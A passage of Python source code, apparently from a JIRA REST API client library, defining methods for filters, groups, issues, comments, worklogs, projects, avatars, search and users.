"""
return self._find_for_resource(Dashboard, id)
# Fields
# non-resource
def fields(self):
"""Return a list of all issue fields."""
return self._get_json('field')
# Filters
def filter(self, id):
"""
Get a filter Resource from the server.
:param id: ID of the filter to get.
"""
return self._find_for_resource(Filter, id)
def favourite_filters(self):
"""Get a list of filter Resources which are the favourites of the currently authenticated user."""
r_json = self._get_json('filter/favourite')
filters = [Filter(self._options, self._session, raw_filter_json)
for raw_filter_json in r_json]
return filters
def create_filter(self, name=None, description=None,
jql=None, favourite=None):
"""
Create a new filter and return a filter Resource for it.
Keyword arguments:
name -- name of the new filter
description -- useful human readable description of the new filter
jql -- query string that defines the filter
favourite -- whether to add this filter to the current user's favorites
"""
data = {}
if name is not None:
data['name'] = name
if description is not None:
data['description'] = description
if jql is not None:
data['jql'] = jql
if favourite is not None:
data['favourite'] = favourite
url = self._get_url('filter')
r = self._session.post(
url, data=json.dumps(data))
raw_filter_json = json_loads(r)
return Filter(self._options, self._session, raw=raw_filter_json)
def update_filter(self, filter_id,
name=None, description=None,
jql=None, favourite=None):
"""
Updates a filter and return a filter Resource for it.
Keyword arguments:
name -- name of the new filter
description -- useful human readable description of the new filter
jql -- query string that defines the filter
favourite -- whether to add this filter to the current user's favorites
"""
filter = self.filter(filter_id)
data = {}
data['name'] = name or filter.name
data['description'] = description or filter.description
data['jql'] = jql or filter.jql
data['favourite'] = favourite or filter.favourite
url = self._get_url('filter/%s' % filter_id)
r = self._session.put(url, headers={'content-type': 'application/json'},
data=json.dumps(data))
raw_filter_json = json.loads(r.text)
return Filter(self._options, self._session, raw=raw_filter_json)
# Groups
# non-resource
def groups(self, query=None, exclude=None, maxResults=9999):
"""
Return a list of groups matching the specified criteria.
Keyword arguments:
query -- filter groups by name with this string
exclude -- filter out groups by name with this string
maxResults -- maximum results to return. defaults to 9999
"""
params = {}
groups = []
if query is not None:
params['query'] = query
if exclude is not None:
params['exclude'] = exclude
if maxResults is not None:
params['maxResults'] = maxResults
for group in self._get_json('groups/picker', params=params)['groups']:
groups.append(group['name'])
return sorted(groups)
def group_members(self, group):
"""
Return a hash or users with their information. Requires JIRA 6.0 or will raise NotImplemented.
"""
if self._version < (6, 0, 0):
raise NotImplementedError(
"Group members is not implemented in JIRA before version 6.0, upgrade the instance, if possible.")
params = {'groupname': group, 'expand': "users"}
r = self._get_json('group', params=params)
size = r['users']['size']
end_index = r['users']['end-index']
while end_index < size - 1:
params = {'groupname': group, 'expand': "users[%s:%s]" % (
end_index + 1, end_index + 50)}
r2 = self._get_json('group', params=params)
for user in r2['users']['items']:
r['users']['items'].append(user)
end_index = r2['users']['end-index']
size = r['users']['size']
result = {}
for user in r['users']['items']:
result[user['name']] = {'fullname': user['displayName'], 'email': user['emailAddress'],
'active': user['active']}
return result
def add_group(self, groupname):
'''
Creates a new group in JIRA.
:param groupname: The name of the group you wish to create.
:return: Boolean - True if succesfull.
'''
url = self._options['server'] + '/rest/api/latest/group'
# implementation based on
# https://docs.atlassian.com/jira/REST/ondemand/#d2e5173
x = OrderedDict()
x['name'] = groupname
payload = json.dumps(x)
self._session.post(url, data=payload)
return True
def remove_group(self, groupname):
'''
Deletes a group from the JIRA instance.
:param groupname: The group to be deleted from the JIRA instance.
:return: Boolean. Returns True on success.
'''
# implementation based on
# https://docs.atlassian.com/jira/REST/ondemand/#d2e5173
url = self._options['server'] + '/rest/api/latest/group'
x = {'groupname': groupname}
self._session.delete(url, params=x)
return True
# Issues
def issue(self, id, fields=None, expand=None):
"""
Get an issue Resource from the server.
:param id: ID or key of the issue to get
:param fields: comma-separated string of issue fields to include in the results
:param expand: extra information to fetch inside each resource
"""
# this allows us to pass Issue objects to issue()
if type(id) == Issue:
return id
issue = Issue(self._options, self._session)
params = {}
if fields is not None:
params['fields'] = fields
if expand is not None:
params['expand'] = expand
issue.find(id, params=params)
return issue
def create_issue(self, fields=None, prefetch=True, **fieldargs):
"""
Create a new issue and return an issue Resource for it.
Each keyword argument (other than the predefined ones) is treated as a field name and the argument's value
is treated as the intended value for that field -- if the fields argument is used, all other keyword arguments
will be ignored.
By default, the client will immediately reload the issue Resource created by this method in order to return
a complete Issue object to the caller; this behavior can be controlled through the 'prefetch' argument.
JIRA projects may contain many different issue types. Some issue screens have different requirements for
fields in a new issue. This information is available through the 'createmeta' method. Further examples are
available here: https://developer.atlassian.com/display/JIRADEV/JIRA+REST+API+Example+-+Create+Issue
:param fields: a dict containing field names and the values to use. If present, all other keyword arguments\
will be ignored
:param prefetch: whether to reload the created issue Resource so that all of its data is present in the value\
returned from this method
"""
data = {}
if fields is not None:
data['fields'] = fields
else:
fields_dict = {}
for field in fieldargs:
fields_dict[field] = fieldargs[field]
data['fields'] = fields_dict
p = data['fields']['project']
if isinstance(p, string_types) or isinstance(p, integer_types):
data['fields']['project'] = {'id': self.project(p).id}
url = self._get_url('issue')
r = self._session.post(url, data=json.dumps(data))
raw_issue_json = json_loads(r)
if 'key' not in raw_issue_json:
raise JIRAError(r.status_code, request=r)
if prefetch:
return self.issue(raw_issue_json['key'])
else:
return Issue(self._options, self._session, raw=raw_issue_json)
def createmeta(self, projectKeys=None, projectIds=[], issuetypeIds=None, issuetypeNames=None, expand=None):
"""
Gets the metadata required to create issues, optionally filtered by projects and issue types.
:param projectKeys: keys of the projects to filter the results with. Can be a single value or a comma-delimited\
string. May be combined with projectIds.
:param projectIds: IDs of the projects to filter the results with. Can be a single value or a comma-delimited\
string. May be combined with projectKeys.
:param issuetypeIds: IDs of the issue types to filter the results with. Can be a single value or a\
comma-delimited string. May be combined with issuetypeNames.
:param issuetypeNames: Names of the issue types to filter the results with. Can be a single value or a\
comma-delimited string. May be combined with issuetypeIds.
:param expand: extra information to fetch inside each resource.
"""
params = {}
if projectKeys is not None:
params['projectKeys'] = projectKeys
if projectIds is not None:
if isinstance(projectIds, string_types):
projectIds = projectIds.split(',')
params['projectIds'] = projectIds
if issuetypeIds is not None:
params['issuetypeIds'] = issuetypeIds
if issuetypeNames is not None:
params['issuetypeNames'] = issuetypeNames
if expand is not None:
params['expand'] = expand
return self._get_json('issue/createmeta', params)
# non-resource
@translate_resource_args
def assign_issue(self, issue, assignee):
"""
Assign an issue to a user. None will set it to unassigned. -1 will set it to Automatic.
:param issue: the issue to assign
:param assignee: the user to assign the issue to
"""
url = self._options['server'] + \
'/rest/api/2/issue/' + str(issue) + '/assignee'
payload = {'name': assignee}
r = self._session.put(
url, data=json.dumps(payload))
@translate_resource_args
def comments(self, issue):
"""
Get a list of comment Resources.
:param issue: the issue to get comments from
"""
r_json = self._get_json('issue/' + str(issue) + '/comment')
comments = [Comment(self._options, self._session, raw_comment_json)
for raw_comment_json in r_json['comments']]
return comments
@translate_resource_args
def comment(self, issue, comment):
"""
Get a comment Resource from the server for the specified ID.
:param issue: ID or key of the issue to get the comment from
:param comment: ID of the comment to get
"""
return self._find_for_resource(Comment, (issue, comment))
@translate_resource_args
def add_comment(self, issue, body, visibility=None):
"""
Add a comment from the current authenticated user on the specified issue and return a Resource for it.
The issue identifier and comment body are required.
:param issue: ID or key of the issue to add the comment to
:param body: Text of the comment to add
:param visibility: a dict containing two entries: "type" and "value". "type" is 'role' (or 'group' if the JIRA\
server has configured comment visibility for groups) and 'value' is the name of the role (or group) to which\
viewing of this comment will be restricted.
"""
data = {
'body': body
}
if visibility is not None:
data['visibility'] = visibility
url = self._get_url('issue/' + str(issue) + '/comment')
r = self._session.post(
url, data=json.dumps(data))
comment = Comment(self._options, self._session, raw=json_loads(r))
return comment
# non-resource
@translate_resource_args
def editmeta(self, issue):
"""
Get the edit metadata for an issue.
:param issue: the issue to get metadata for
"""
return self._get_json('issue/' + str(issue) + '/editmeta')
@translate_resource_args
def remote_links(self, issue):
"""
Get a list of remote link Resources from an issue.
:param issue: the issue to get remote links from
"""
r_json = self._get_json('issue/' + str(issue) + '/remotelink')
remote_links = [RemoteLink(
self._options, self._session, raw_remotelink_json) for raw_remotelink_json in r_json]
return remote_links
@translate_resource_args
def remote_link(self, issue, id):
"""
Get a remote link Resource from the server.
:param issue: the issue holding the remote link
:param id: ID of the remote link
"""
return self._find_for_resource(RemoteLink, (issue, id))
# removed the @translate_resource_args because it prevents us from finding
# information for building a proper link
def add_remote_link(self, issue, destination, globalId=None, application=None, relationship=None):
"""
Add a remote link from an issue to an external application and returns a remote link Resource
for it. ``object`` should be a dict containing at least ``url`` to the linked external URL and
``title`` to display for the link inside JIRA.
For definitions of the allowable fields for ``object`` and the keyword arguments ``globalId``, ``application``
and ``relationship``, see https://developer.atlassian.com/display/JIRADEV/JIRA+REST+API+for+Remote+Issue+Links.
:param issue: the issue to add the remote link to
:param destination: the link details to add (see the above link for details)
:param globalId: unique ID for the link (see the above link for details)
:param application: application information for the link (see the above link for details)
:param relationship: relationship description for the link (see the above link for details)
"""
warnings.warn(
"broken: see https://bitbucket.org/bspeakmon/jira-python/issue/46 and https://jira.atlassian.com/browse/JRA-38551",
Warning)
try:
applicationlinks = self.applicationlinks()
except JIRAError as e:
applicationlinks = []
# In many (if not most) configurations, non-admin users are
# not allowed to list applicationlinks; if we aren't allowed,
# let's let people try to add remote links anyway, we just
# won't be able to be quite as helpful.
warnings.warn(
"Unable to gather applicationlinks; you will not be able "
"to add links to remote issues: (%s) %s" % (
e.status_code,
e.text
),
Warning
)
data = {}
if type(destination) == Issue:
data['object'] = {
'title': str(destination),
'url': destination.permalink()
}
for x in applicationlinks:
if x['application']['displayUrl'] == destination._options['server']:
data['globalId'] = "appId=%s&issueId=%s" % (
x['application']['id'], destination.raw['id'])
data['application'] = {
'name': x['application']['name'], 'type': "com.atlassian.jira"}
break
if 'globalId' not in data:
raise NotImplementedError(
"Unable to identify the issue to link to.")
else:
if globalId is not None:
data['globalId'] = globalId
if application is not None:
data['application'] = application
data['object'] = destination
if relationship is not None:
data['relationship'] = relationship
# check if the link comes from one of the configured application links
for x in applicationlinks:
if x['application']['displayUrl'] == self._options['server']:
data['globalId'] = "appId=%s&issueId=%s" % (
x['application']['id'], destination.raw['id'])
data['application'] = {
'name': x['application']['name'], 'type': "com.atlassian.jira"}
break
url = self._get_url('issue/' + str(issue) + '/remotelink')
r = self._session.post(
url, data=json.dumps(data))
remote_link = RemoteLink(
self._options, self._session, raw=json_loads(r))
return remote_link
def add_simple_link(self, issue, object):
"""
Add a simple remote link from an issue to web resource. This avoids the admin access problems from add_remote_link by just using a simple object and presuming all fields are correct and not requiring more complex ``application`` data.
``object`` should be a dict containing at least ``url`` to the linked external URL
and ``title`` to display for the link inside JIRA.
For definitions of the allowable fields for ``object`` , see https://developer.atlassian.com/display/JIRADEV/JIRA+REST+API+for+Remote+Issue+Links.
:param issue: the issue to add the remote link to
:param object: the dictionary used to create remotelink data
"""
data = {}
# hard code data dict to be passed as ``object`` to avoid any permissions errors
data = object
url = self._get_url('issue/' + str(issue) + '/remotelink')
r = self._session.post(
url, data=json.dumps(data))
simple_link = RemoteLink(
self._options, self._session, raw=json_loads(r))
return simple_link
# non-resource
@translate_resource_args
def transitions(self, issue, id=None, expand=None):
"""
Get a list of the transitions available on the specified issue to the current user.
:param issue: ID or key of the issue to get the transitions from
:param id: if present, get only the transition matching this ID
:param expand: extra information to fetch inside each transition
"""
params = {}
if id is not None:
params['transitionId'] = id
if expand is not None:
params['expand'] = expand
return self._get_json('issue/' + str(issue) + '/transitions', params=params)['transitions']
def find_transitionid_by_name(self, issue, transition_name):
"""
Get a transitionid available on the specified issue to the current user.
Look at https://developer.atlassian.com/static/rest/jira/6.1.html#d2e1074 for json reference
:param issue: ID or key of the issue to get the transitions from
:param trans_name: iname of transition we are looking for
"""
transitions_json = self.transitions(issue)
id = None
for transition in transitions_json:
if transition["name"].lower() == transition_name.lower():
id = transition["id"]
break
return id
@translate_resource_args
def transition_issue(self, issue, transition, fields=None, comment=None, **fieldargs):
# TODO: Support update verbs (same as issue.update())
"""
Perform a transition on an issue.
Each keyword argument (other than the predefined ones) is treated as a field name and the argument's value
is treated as the intended value for that field -- if the fields argument is used, all other keyword arguments
will be ignored. Field values will be set on the issue as part of the transition process.
:param issue: ID or key of the issue to perform the transition on
:param transition: ID or name of the transition to perform
:param comment: *Optional* String to add as comment to the issue when performing the transition.
:param fields: a dict containing field names and the values to use. If present, all other keyword arguments\
will be ignored
"""
transitionId = None
try:
transitionId = int(transition)
except:
# cannot cast to int, so try to find transitionId by name
transitionId = self.find_transitionid_by_name(issue, transition)
if transitionId is None:
raise JIRAError("Invalid transition name. %s" % transition)
data = {
'transition': {
'id': transitionId
}
}
if comment:
data['update'] = {'comment': [{'add': {'body': comment}}]}
if fields is not None:
data['fields'] = fields
else:
fields_dict = {}
for field in fieldargs:
fields_dict[field] = fieldargs[field]
data['fields'] = fields_dict
url = self._get_url('issue/' + str(issue) + '/transitions')
r = self._session.post(
url, data=json.dumps(data))
@translate_resource_args
def votes(self, issue):
"""
Get a votes Resource from the server.
:param issue: ID or key of the issue to get the votes for
"""
return self._find_for_resource(Votes, issue)
@translate_resource_args
def add_vote(self, issue):
"""
Register a vote for the current authenticated user on an issue.
:param issue: ID or key of the issue to vote on
"""
url = self._get_url('issue/' + str(issue) + '/votes')
r = self._session.post(url)
@translate_resource_args
def remove_vote(self, issue):
"""
Remove the current authenticated user's vote from an issue.
:param issue: ID or key of the issue to unvote on
"""
url = self._get_url('issue/' + str(issue) + '/votes')
self._session.delete(url)
@translate_resource_args
def watchers(self, issue):
"""
Get a watchers Resource from the server for an issue.
:param issue: ID or key of the issue to get the watchers for
"""
return self._find_for_resource(Watchers, issue)
@translate_resource_args
def add_watcher(self, issue, watcher):
"""
Add a user to an issue's watchers list.
:param issue: ID or key of the issue affected
:param watcher: username of the user to add to the watchers list
"""
url = self._get_url('issue/' + str(issue) + '/watchers')
self._session.post(
url, data=json.dumps(watcher))
@translate_resource_args
def remove_watcher(self, issue, watcher):
"""
Remove a user from an issue's watch list.
:param issue: ID or key of the issue affected
:param watcher: username of the user to remove from the watchers list
"""
url = self._get_url('issue/' + str(issue) + '/watchers')
params = {'username': watcher}
result = self._session.delete(url, params=params)
return result
@translate_resource_args
def worklogs(self, issue):
"""
Get a list of worklog Resources from the server for an issue.
:param issue: ID or key of the issue to get worklogs from
"""
r_json = self._get_json('issue/' + str(issue) + '/worklog')
worklogs = [Worklog(self._options, self._session, raw_worklog_json)
for raw_worklog_json in r_json['worklogs']]
return worklogs
@translate_resource_args
def worklog(self, issue, id):
"""
Get a specific worklog Resource from the server.
:param issue: ID or key of the issue to get the worklog from
:param id: ID of the worklog to get
"""
return self._find_for_resource(Worklog, (issue, id))
@translate_resource_args
def add_worklog(self, issue, timeSpent=None, timeSpentSeconds=None, adjustEstimate=None,
newEstimate=None, reduceBy=None, comment=None, started=None, user=None):
"""
Add a new worklog entry on an issue and return a Resource for it.
:param issue: the issue to add the worklog to
:param timeSpent: a worklog entry with this amount of time spent, e.g. "2d"
:param adjustEstimate: (optional) allows the user to provide specific instructions to update the remaining\
time estimate of the issue. The value can either be ``new``, ``leave``, ``manual`` or ``auto`` (default).
:param newEstimate: the new value for the remaining estimate field. e.g. "2d"
:param reduceBy: the amount to reduce the remaining estimate by e.g. "2d"
:param started: Moment when the work is logged, if not specified will default to now
:param comment: optional worklog comment
"""
params = {}
if adjustEstimate is not None:
params['adjustEstimate'] = adjustEstimate
if newEstimate is not None:
params['newEstimate'] = newEstimate
if reduceBy is not None:
params['reduceBy'] = reduceBy
data = {}
if timeSpent is not None:
data['timeSpent'] = timeSpent
if timeSpentSeconds is not None:
data['timeSpentSeconds'] = timeSpentSeconds
if comment is not None:
data['comment'] = comment
elif user:
# we log user inside comment as it doesn't always work
data['comment'] = user
if started is not None:
# based on REST Browser it needs: "2014-06-03T08:21:01.273+0000"
data['started'] = started.strftime("%Y-%m-%dT%H:%M:%S.000%z")
if user is not None:
data['author'] = {"name": user,
'self': self.JIRA_BASE_URL + '/rest/api/2/user?username=' + user,
'displayName': user,
'active': False
}
data['updateAuthor'] = data['author']
# TODO: report bug to Atlassian: author and updateAuthor parameters are
# ignored.
url = self._get_url('issue/{0}/worklog'.format(issue))
r = self._session.post(url, params=params, data=json.dumps(data))
return Worklog(self._options, self._session, json_loads(r))
# Issue links
@translate_resource_args
def create_issue_link(self, type, inwardIssue, outwardIssue, comment=None):
"""
Create a link between two issues.
:param type: the type of link to create
:param inwardIssue: the issue to link from
:param outwardIssue: the issue to link to
:param comment: a comment to add to the issues with the link. Should be a dict containing ``body``\
and ``visibility`` fields: ``body`` being the text of the comment and ``visibility`` being a dict containing\
two entries: ``type`` and ``value``. ``type`` is ``role`` (or ``group`` if the JIRA server has configured\
comment visibility for groups) and ``value`` is the name of the role (or group) to which viewing of this\
comment will be restricted.
"""
# let's see if we have the right issue link 'type' and fix it if needed
if not hasattr(self, '_cached_issuetypes'):
self._cached_issue_link_types = self.issue_link_types()
if type not in self._cached_issue_link_types:
for lt in self._cached_issue_link_types:
if lt.outward == type:
# we are smart to figure it out what he ment
type = lt.name
break
elif lt.inward == type:
# so that's the reverse, so we fix the request
type = lt.name
inwardIssue, outwardIssue = outwardIssue, inwardIssue
break
data = {
'type': {
'name': type
},
'inwardIssue': {
'key': inwardIssue
},
'outwardIssue': {
'key': outwardIssue
},
'comment': comment
}
url = self._get_url('issueLink')
r = self._session.post(
url, data=json.dumps(data))
def issue_link(self, id):
"""
Get an issue link Resource from the server.
:param id: ID of the issue link to get
"""
return self._find_for_resource(IssueLink, id)
# Issue link types
def issue_link_types(self):
"""Get a list of issue link type Resources from the server."""
r_json = self._get_json('issueLinkType')
link_types = [IssueLinkType(self._options, self._session, raw_link_json) for raw_link_json in
r_json['issueLinkTypes']]
return link_types
def issue_link_type(self, id):
"""
Get an issue link type Resource from the server.
:param id: ID of the issue link type to get
"""
return self._find_for_resource(IssueLinkType, id)
# Issue types
def issue_types(self):
"""Get a list of issue type Resources from the server."""
r_json = self._get_json('issuetype')
issue_types = [IssueType(
self._options, self._session, raw_type_json) for raw_type_json in r_json]
return issue_types
def issue_type(self, id):
"""
Get an issue type Resource from the server.
:param id: ID of the issue type to get
"""
return self._find_for_resource(IssueType, id)
# User permissions
# non-resource
def my_permissions(self, projectKey=None, projectId=None, issueKey=None, issueId=None):
"""
Get a dict of all available permissions on the server.
:param projectKey: limit returned permissions to the specified project
:param projectId: limit returned permissions to the specified project
:param issueKey: limit returned permissions to the specified issue
:param issueId: limit returned permissions to the specified issue
"""
params = {}
if projectKey is not None:
params['projectKey'] = projectKey
if projectId is not None:
params['projectId'] = projectId
if issueKey is not None:
params['issueKey'] = issueKey
if issueId is not None:
params['issueId'] = issueId
return self._get_json('mypermissions', params=params)
# Priorities
def priorities(self):
"""Get a list of priority Resources from the server."""
r_json = self._get_json('priority')
priorities = [Priority(
self._options, self._session, raw_priority_json) for raw_priority_json in r_json]
return priorities
def priority(self, id):
"""
Get a priority Resource from the server.
:param id: ID of the priority to get
"""
return self._find_for_resource(Priority, id)
# Projects
def projects(self):
"""Get a list of project Resources from the server visible to the current authenticated user."""
r_json = self._get_json('project')
projects = [Project(
self._options, self._session, raw_project_json) for raw_project_json in r_json]
return projects
def project(self, id):
"""
Get a project Resource from the server.
:param id: ID or key of the project to get
"""
return self._find_for_resource(Project, id)
# non-resource
@translate_resource_args
def project_avatars(self, project):
"""
Get a dict of all avatars for a project visible to the current authenticated user.
:param project: ID or key of the project to get avatars for
"""
return self._get_json('project/' + project + '/avatars')
@translate_resource_args
def create_temp_project_avatar(self, project, filename, size, avatar_img, contentType=None, auto_confirm=False):
"""
Register an image file as a project avatar. The avatar created is temporary and must be confirmed before it can
be used.
Avatar images are specified by a filename, size, and file object. By default, the client will attempt to
autodetect the picture's content type: this mechanism relies on libmagic and will not work out of the box
on Windows systems (see http://filemagic.readthedocs.org/en/latest/guide.html for details on how to install
support). The ``contentType`` argument can be used to explicitly set the value (note that JIRA will reject any
type other than the well-known ones for images, e.g. ``image/jpg``, ``image/png``, etc.)
This method returns a dict of properties that can be used to crop a subarea of a larger image for use. This
dict should be saved and passed to :py:meth:`confirm_project_avatar` to finish the avatar creation process. If\
you want to cut out the middleman and confirm the avatar with JIRA's default cropping, pass the 'auto_confirm'\
argument with a truthy value and :py:meth:`confirm_project_avatar` will be called for you before this method\
returns.
:param project: ID or key of the project to create the avatar in
:param filename: name of the avatar file
:param size: size of the avatar file
:param avatar_img: file-like object holding the avatar
:param contentType: explicit specification for the avatar image's content-type
:param boolean auto_confirm: whether to automatically confirm the temporary avatar by calling\
:py:meth:`confirm_project_avatar` with the return value of this method.
"""
size_from_file = os.path.getsize(filename)
if size != size_from_file:
size = size_from_file
params = {
'filename': filename,
'size': size
}
headers = {'X-Atlassian-Token': 'no-check'}
if contentType is not None:
headers['content-type'] = contentType
else:
# try to detect content-type, this may return None
headers['content-type'] = self._get_mime_type(avatar_img)
url = self._get_url('project/' + project + '/avatar/temporary')
r = self._session.post(
url, params=params, headers=headers, data=avatar_img)
cropping_properties = json_loads(r)
if auto_confirm:
return self.confirm_project_avatar(project, cropping_properties)
else:
return cropping_properties
@translate_resource_args
def confirm_project_avatar(self, project, cropping_properties):
"""
Confirm the temporary avatar image previously uploaded with the specified cropping.
After a successful registry with :py:meth:`create_temp_project_avatar`, use this method to confirm the avatar
for use. The final avatar can be a subarea of the uploaded image, which is customized with the
``cropping_properties``: the return value of :py:meth:`create_temp_project_avatar` should be used for this
argument.
:param project: ID or key of the project to confirm the avatar in
:param cropping_properties: a dict of cropping properties from :py:meth:`create_temp_project_avatar`
"""
data = cropping_properties
url = self._get_url('project/' + project + '/avatar')
r = self._session.post(
url, data=json.dumps(data))
return json_loads(r)
@translate_resource_args
def set_project_avatar(self, project, avatar):
"""
Set a project's avatar.
:param project: ID or key of the project to set the avatar on
:param avatar: ID of the avatar to set
"""
self._set_avatar(
None, self._get_url('project/' + project + '/avatar'), avatar)
@translate_resource_args
def delete_project_avatar(self, project, avatar):
"""
Delete a project's avatar.
:param project: ID or key of the project to delete the avatar from
:param avatar: ID of the avater to delete
"""
url = self._get_url('project/' + project + '/avatar/' + avatar)
r = self._session.delete(url)
@translate_resource_args
def project_components(self, project):
"""
Get a list of component Resources present on a project.
:param project: ID or key of the project to get components from
"""
r_json = self._get_json('project/' + project + '/components')
components = [Component(
self._options, self._session, raw_comp_json) for raw_comp_json in r_json]
return components
@translate_resource_args
def project_versions(self, project):
"""
Get a list of version Resources present on a project.
:param project: ID or key of the project to get versions from
"""
r_json = self._get_json('project/' + project + '/versions')
versions = [
Version(self._options, self._session, raw_ver_json) for raw_ver_json in r_json]
return versions
# non-resource
@translate_resource_args
def project_roles(self, project):
"""
Get a dict of role names to resource locations for a project.
:param project: ID or key of the project to get roles from
"""
return self._get_json('project/' + project + '/role')
@translate_resource_args
def project_role(self, project, id):
"""
Get a role Resource.
:param project: ID or key of the project to get the role from
:param id: ID of the role to get
"""
return self._find_for_resource(Role, (project, id))
# Resolutions
def resolutions(self):
"""Get a list of resolution Resources from the server."""
r_json = self._get_json('resolution')
resolutions = [Resolution(
self._options, self._session, raw_res_json) for raw_res_json in r_json]
return resolutions
def resolution(self, id):
"""
Get a resolution Resource from the server.
:param id: ID of the resolution to get
"""
return self._find_for_resource(Resolution, id)
# Search
def search_issues(self, jql_str, startAt=0, maxResults=50, validate_query=True, fields=None, expand=None,
json_result=None):
"""
Get a ResultList of issue Resources matching a JQL search string.
:param jql_str: the JQL search string to use
:param startAt: index of the first issue to return
:param maxResults: maximum number of issues to return. Total number of results
is available in the ``total`` attribute of the returned ResultList.
If maxResults evaluates as False, it will try to get all issues in batches of 50.
:param fields: comma-separated string of issue fields to include in the results
:param expand: extra information to fetch inside each resource
"""
# TODO what to do about the expand, which isn't related to the issues?
infinite = False
maxi = 50
idx = 0
if fields is None:
fields = []
if isinstance(fields, ("".__class__, u"".__class__)):
fields = fields.split(",")
# this will translate JQL field names to REST API Name
# most people do know the JQL names so this will help them use the API easier
untranslate = {} # use to add friendly aliases when we get the results back
if self._fields:
for i, field in enumerate(fields):
if field in self._fields:
untranslate[self._fields[field]] = fields[i]
fields[i] = self._fields[field]
# If None is passed as parameter, this fetch all issues from the query
if not maxResults:
maxResults = maxi
infinite = True
search_params = {
"jql": jql_str,
"startAt": startAt,
"maxResults": maxResults,
"validateQuery": validate_query,
"fields": fields,
"expand": expand
}
if json_result:
return self._get_json('search', params=search_params)
resource = self._get_json('search', params=search_params)
issues = [Issue(self._options, self._session, raw_issue_json)
for raw_issue_json in resource['issues']]
cnt = len(issues)
total = resource['total']
if infinite:
while cnt == maxi:
idx += maxi
search_params["startAt"] = idx
resource = self._get_json('search', params=search_params)
issue_batch = [Issue(self._options, self._session, raw_issue_json) for raw_issue_json in
resource['issues']]
issues.extend(issue_batch)
cnt = len(issue_batch)
if untranslate:
for i in issues:
for k, v in untranslate.items():
if k in i.raw['fields']:
i.raw['fields'][v] = i.raw['fields'][k]
return ResultList(issues, total)
# Security levels
def security_level(self, id):
"""
Get a security level Resource.
:param id: ID of the security level to get
"""
return self._find_for_resource(SecurityLevel, id)
# Server info
# non-resource
def server_info(self):
"""Get a dict of server information for this JIRA instance."""
return self._get_json('serverInfo')
def myself(self):
"""Get a dict of server information for this JIRA instance."""
return self._get_json('myself')
# Status
def statuses(self):
"""Get a list of status Resources from the server."""
r_json = self._get_json('status')
statuses = [Status(self._options, self._session, raw_stat_json)
for raw_stat_json in r_json]
return statuses
def status(self, id):
"""
Get a status Resource from the server.
:param id: ID of the status resource to get
"""
return self._find_for_resource(Status, id)
# Users
def user(self, id, expand=None):
"""
Get a user Resource from the server.
:param id: ID of the user to get
:param expand: extra information to fetch inside each resource
"""
user = User(self._options, self._session)
params = {}
if expand is not None:
params['expand'] = expand
user.find(id, params=params)
return user
def search_assignable_users_for_projects(self, username, projectKeys, startAt=0, maxResults=50):
"""
Get a list of user Resources that match the search string and can be assigned issues for projects.
:param username: a string to match usernames against
:param projectKeys: comma-separated list of project keys to check for issue assignment permissions
:param startAt: index of the first user to return
:param maxResults: maximum number of users to return
"""
params = {
'username': username,
'projectKeys': projectKeys,
'startAt': startAt,
'maxResults': maxResults
}
r_json = self._get_json(
'user/assignable/multiProjectSearch', params=params)
users = [User(self._options, self._session, raw_user_json)
for raw_user_json in r_json]
return users
def search_assignable_users_for_issues(self, username, project=None, issueKey=None, expand=None, startAt=0,
maxResults=50):
"""
Get a list of user Resources that match the search string for assigning or creating issues.
This method is intended to find users that are eligible to create issues in a project or be assigned
to an existing issue. When searching for eligible creators, specify a project. When searching for eligible
assignees, specify an issue key.
:param username: a string to match usernames against
:param project: filter returned users by permission in this project (expected if a result will be used to \
create an issue)
:param issueKey: filter returned users by this issue (expected if a result will be used to edit this issue)
:param expand: extra information to fetch inside each resource
:param startAt: index of the first user to return
:param maxResults: maximum number of users to return
"""
params = {
'username': username,
'startAt': startAt,
'maxResults': maxResults,
}
if project is not None:
params['project'] = project
if issueKey is not None:
params['issueKey'] = issueKey
if expand is not None:
params['expand'] = expand
r_json = self._get_json('user/assignable/search', params)
users = [User(self._options, self._session, raw_user_json)
for raw_user_json in r_json]
return users
# non-resource
def user_avatars(self, username):
"""
Get a dict of avatars for the specified user.
:param username: the username to get avatars for
"""
return self._get_json('user/avatars', params={'username': username})
def create_temp_user_avatar(self, user, filename, size, avatar_img, contentType=None, auto_confirm=False):
"""
Register an image file as a user avatar. The avatar created is temporary and must be confirmed before it can
be used.
Avatar images are specified by a filename, size, and file object. By default, the client will attempt to
autodetect the picture's content type: this mechanism relies on ``libmagic`` and will not work out of the box
on Windows systems (see http://filemagic.readthedocs.org/en/latest/guide.html for details on how to install
support). The ``contentType`` argument can be used to explicitly set the value (note that JIRA will reject any
type other than the well-known ones for images, e.g. ``image/jpg``, ``image/png``, etc.)
This method returns a dict of properties that can be used to crop a subarea of a larger image for use. This
dict should be saved and passed to :py:meth:`confirm_user_avatar` to finish the avatar creation process. If you
want to cut out the middleman and confirm the avatar with JIRA's default cropping, pass the ``auto_confirm``
argument with a truthy value and :py:meth:`confirm_user_avatar` will be called for you before this method
returns.
:param user: user to register the avatar for
:param filename: name of the avatar file
:param size: size of the avatar file
:param avatar_img: file-like object containing the avatar
:param contentType: explicit specification for the avatar image's content-type
:param auto_confirm: whether to automatically confirm the temporary avatar by calling\
:py:meth:`confirm_user_avatar` with the return value of this method.
"""
size_from_file = os.path.getsize(filename)
if size != size_from_file:
size = size_from_file
params = {
'username': user,
'filename': filename,
'size': size
}
headers = {'X-Atlassian-Token': 'no-check'}
if contentType is not None:
headers['content-type'] = contentType
else:
# try to detect content-type, this may return None
headers['content-type'] = self._get_mime_type(avatar_img)
url = self._get_url('user/avatar/temporary')
r = self._session.post(
url, params=params, headers=headers, data=avatar_img)
cropping_properties = json_loads(r)
if auto_confirm:
return self.confirm_user_avatar(user, cropping_properties)
else:
return cropping_properties
def confirm_user_avatar(self, user, cropping_properties):
"""
Confirm the temporary avatar image previously uploaded with the specified cropping.
After a successful registry with :py:meth:`create_temp_user_avatar`, use this method to confirm the avatar for
use. The final avatar can be a subarea of the uploaded image, which is customized with the
``cropping_properties``: the return value of :py:meth:`create_temp_user_avatar` should be used for this
argument.
:param user: the user to confirm the avatar for
:param cropping_properties: a dict of cropping properties from :py:meth:`create_temp_user_avatar`
"""
data = cropping_properties
url = self._get_url('user/avatar')
r = self._session.post(url, params={'username': user},
data=json.dumps(data))
return json_loads(r)
def set_user_avatar(self, username, avatar):
"""
Set a user's avatar.
:param username: the user to set the avatar for
:param avatar: ID of the avatar to set
"""
self._set_avatar(
{'username': username}, self._get_url('user/avatar'), avatar)
def delete_user_avatar(self, username, avatar):
"""
Delete a user's avatar.
:param username: the user to delete the avatar from
:param avatar: ID of the avatar to remove
"""
